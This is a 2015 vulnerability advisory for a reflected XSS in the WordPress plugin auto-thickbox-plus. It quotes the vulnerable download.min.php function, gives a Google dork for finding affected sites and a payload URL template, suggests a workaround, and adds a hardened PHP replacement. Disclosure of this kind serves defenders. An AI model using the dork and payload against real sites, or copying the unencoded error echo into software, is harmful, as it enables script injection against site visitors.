
WordPress Plugin auto-thickbox-plus XSS

Author: bRpsd, Published: 03-07-2015
################################################
Exploit Title => WordPress Plugin auto-thickbox-plus XSS
Exploit Date => 01 - 07 - 2015
Exploit Author => bRpsd
WP Plugin Download => https://wordpress.org/plugins/auto-thickbox-plus
Dork => inurl:/wp-content/plugins/auto-thickbox-plus/
Skype => vegnox, Mail => cy@live.no
################################################

Bug Type: Reflected XSS
Vulnerable File: download.min.php

Code ::

//

function force_download($a){
    if(empty($a)){
        die('Error: File not specified.');
        return;
    }
    // plugin-side sanitizer; as the advisory shows, it leaves HTML in the value intact
    $a=sanitize_url($a);
    if(!file_exists2($a)){
        // the raw ?file= value ($a) is concatenated into the HTML error page
        // without encoding: this is the reflected XSS ('$file=' is literal text
        // because of the single quotes)
        die('Error: File not found. $file='.$a);
        return;
    }
    // remainder of the function is not quoted in the advisory
}

\\


Payload :
localhost/wp-content/plugins/auto-thickbox-plus/download.min.php?file=[XSS HERE!]




I know it's weak, but it exists. We have to stay cautious.

Security updates? Unfortunately, none exist.
As a workaround you can remove the file or filter the URL (the file parameter) before it reaches the script.
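A hardened replacement for the quoted force_download() routine, added here as an example and not taken from the plugin: errors are returned as plain text with nosniff and never echo the request value, and, going a step beyond the advisory, the requested name must resolve to a regular file below an assumed base directory ($allowed_base, a constructed path) before anything is sent.

```php
<?php
// Added example (not the plugin's code). Assumes the endpoint should only
// serve files below $allowed_base (hypothetical directory) and replaces the
// plugin's file_exists2() helper with a realpath() containment check.

function fail(int $status, string $message): void
{
    // Plain-text body plus nosniff: nothing here is parsed as HTML by the
    // browser, so even a reflected value could not become markup.
    http_response_code($status);
    header('Content-Type: text/plain; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    exit($message);
}

function force_download_safe($file, string $allowed_base): void
{
    // Reject missing, empty and non-scalar (?file[]=) parameters alike.
    if (!is_string($file) || $file === '') {
        fail(400, 'Error: File not specified.');
    }

    $base = realpath($allowed_base);
    $path = realpath($allowed_base . '/' . $file);

    // Must resolve to a regular file strictly inside $base (blocks ../ escapes).
    if ($base === false || $path === false || !is_file($path)
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        // The original bug was concatenating $a into die(); here the request
        // value is never echoed, the client only learns that the lookup failed.
        fail(404, 'Error: File not found.');
    }

    // Headers are built from the resolved server-side name, not the raw input,
    // and CR/LF/quote characters are stripped to keep the header well-formed.
    $name = str_replace(['"', "\r", "\n"], '', basename($path));
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . (string) filesize($path));
    header('Content-Disposition: attachment; filename="' . $name . '"');
    readfile($path);
    exit;
}

// Entry point: same ?file= parameter as the original script.
force_download_safe($_GET['file'] ?? null, __DIR__ . '/files');
```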
